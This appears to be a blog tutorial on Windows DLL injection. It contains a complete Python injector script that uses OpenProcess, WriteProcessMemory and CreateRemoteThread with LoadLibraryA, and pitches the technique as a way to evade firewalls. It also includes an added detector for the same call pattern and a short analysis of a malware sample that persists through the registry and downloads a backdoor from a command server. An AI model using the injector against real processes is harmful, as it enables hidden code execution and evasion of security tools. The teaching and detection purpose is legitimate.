There are a lot of ways to alter a process's execution path. Oh, aren't they many! In this article we'll tackle one of the most commonly used techniques, DLL injection. We'll start by looking at its concept and how to implement it yourself, then see it work in action in real malware. DLL injection is a very common technique where you inject a DLL into an executing binary; the DLL then runs with that binary's privileges, which would be great for evading a firewall, for example.
Overall there are two types of injection, whether it's code or DLL injection. Static injection is when you change the binary itself before executing. Dynamic injection is when you change the behaviour during execution.
In dynamic DLL injection we force the binary to load the DLL by executing kernel32.LoadLibraryA in a new remote thread that we create in it.
Now off to code so you get the picture:
```python
# Python 2 script (print statements, byte-string paths)
from ctypes import *
import os
import sys

# usage: DllInjection.py <pid> <dll_path>

# refer to MSDN if you don't know what these flags are
PG_RW = 0x04
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)

# load kernel32 library
kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]
dll_len = len(dll_path)

# check if the dll exists
if not os.path.isfile(dll_path):
    print "Dll not found , recheck the address"
    sys.exit(0)

# open target process
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))

# if failed , get out of here
if not h_process:
    print "Failed to get a handle to the process"
    sys.exit(0)

# allocate memory in target process to put loadLibraryA argument ( our dll )
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PG_RW)

# write the argument (again the path to our dll) in the process memory we just allocated.
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# get LoadLibraryA address
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA")

# Create a new remote thread , executing loadLibrary with the argument we wrote above
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print "Failed to create thread"
    sys.exit(0)

print "DLL injection success! ... Thread created with id 0x%08x" % thread_id.value
```
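The same call sequence seen from the defender's side, as an added example that is not part of the original article: it flags a remote thread that starts at LoadLibrary with an argument the same caller earlier wrote into the same target process. The trace record format, the pids and the DLL path are constructed for illustration.

```python
# Constructed API-call trace in a hypothetical record format (not a real tool's
# output): caller pid, API name, target pid and the arguments the check needs.
TRACE = [
    {"pid": 4120, "api": "OpenProcess", "target": 2288},
    {"pid": 4120, "api": "VirtualAllocEx", "target": 2288, "addr": 0x2A0000, "size": 21},
    {"pid": 4120, "api": "WriteProcessMemory", "target": 2288, "addr": 0x2A0000,
     "data": b"C:\\Users\\Public\\x.dll"},
    {"pid": 4120, "api": "CreateRemoteThread", "target": 2288,
     "start": "kernel32.LoadLibraryA", "param": 0x2A0000},
    # Writes into another process but never starts a remote thread there.
    {"pid": 900, "api": "WriteProcessMemory", "target": 901, "addr": 0x500000,
     "data": b"\xcc"},
    # Remote thread whose argument the caller never wrote: not this pattern.
    {"pid": 700, "api": "CreateRemoteThread", "target": 701,
     "start": "kernel32.LoadLibraryA", "param": 0x123000},
]

LOADERS = {"kernel32.LoadLibraryA": "latin-1", "kernel32.LoadLibraryW": "utf-16-le"}


def find_dll_injection(trace):
    """Flag remote threads that start at LoadLibrary with an argument the same
    caller earlier wrote into the same target process."""
    writes = {}    # (caller pid, target pid) -> [(address, bytes written)]
    findings = []
    for ev in trace:
        key = (ev["pid"], ev["target"])
        if ev["pid"] == ev["target"]:
            continue    # acting on itself is not remote injection
        if ev["api"] == "WriteProcessMemory":
            writes.setdefault(key, []).append((ev["addr"], ev["data"]))
        elif ev["api"] == "CreateRemoteThread" and ev["start"] in LOADERS:
            for addr, data in writes.get(key, []):
                # The thread argument may point anywhere inside a written buffer.
                if addr <= ev["param"] < addr + len(data):
                    raw = data[ev["param"] - addr:]
                    path = raw.decode(LOADERS[ev["start"]], "replace")
                    findings.append({"injector": ev["pid"], "target": ev["target"],
                                     "dll": path.split("\x00")[0]})
                    break
    return findings


if __name__ == "__main__":
    for hit in find_dll_injection(TRACE):
        print("pid %(injector)d loaded %(dll)s into pid %(target)d" % hit)
```

Correlating on the written buffer rather than on CreateRemoteThread alone keeps remote threads with unrelated arguments out of the results and recovers the DLL path for triage.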
Now that you get the concept, let's take a look at DLL injection in action.
MD5 : E276F2C49D194DEF764A383482ECBD03
The point of the article is not to do a full analysis, so I'll skip a lot of details and focus mainly on the DLL injection part.
Just to put you in the picture, in the first stage the malware creates 3 files: shell32.dll, 123.dll and 123.info.
It'll write the path to the binary in 123.info, then copy some data into shell32.dll and edit the registry, writing the value shell32.dll to it in order to get loaded on system boot by InProcServer32.
So now you can conclude that a system reboot will come next, so that shell32.dll comes to life!
And that ends the second stage. That leaves us with shell32.dll to analyze: once it gets loaded in explorer.exe, the DLL will inject itself into iexplorer.exe.
This looks familiar, right? Once the remote thread in iexplorer.exe executes, the malicious activity will start.
The thread will use the send and recv functions from WS2_32.dll to communicate with the C&C at 188.8.131.52. The data received will be saved on disk as 123.dll and 123.complite; lastly it'll close the socket and create a new thread executing 123.dll, which will probably be a backdoor.
I chose not to go any further because the point of the article was to show you the concept of DLL injection in a real-life scenario. I may continue the analysis in a later article. Until then, good luck!